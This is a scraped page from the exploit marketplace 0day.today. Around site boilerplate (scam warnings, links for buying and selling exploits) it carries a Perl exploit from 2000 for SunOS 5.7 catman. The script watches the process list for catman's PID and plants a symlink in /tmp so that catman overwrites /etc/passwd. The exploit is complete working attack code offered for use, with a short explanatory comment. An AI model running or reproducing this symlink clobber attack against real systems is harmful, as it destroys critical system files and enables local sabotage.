0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit
============================================================= SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit ============================================================= #!/usr/local/bin/perl -w # # The problem is catman creates files in /tmp # insecurly. They are based on the PID of the # catman process, catman will happily clobber # any files that are symlinked to that file. # The idea of this script is to watch the # process list for the catman process, get # the pid and Create a symlink in /tmp to our # file to be clobbered. This exploit depends # on system speed and process load. This # worked on a patched Solaris 2.7 box (August # 2000 patch cluster) # SunOS rootabega 5.7 Generic_106541-12 sun4u # sparc SUNW,Ultra-1 lwc@vapid.betteros.org # 11/21/2000 Vapid Labs. # http://vapid.betteros.org $clobber = "/etc/passwd"; while(1) { open ps,"ps -ef | grep -v grep |grep -v PID |"; while(<ps>) { @args = split " ", $_; if (/catman/) { print "Symlinking sman_$args[1] to $clobber\n"; symlink($clobber,"/tmp/sman_$args[1]"); exit(1); } } } # 0day.today [2024-11-15] #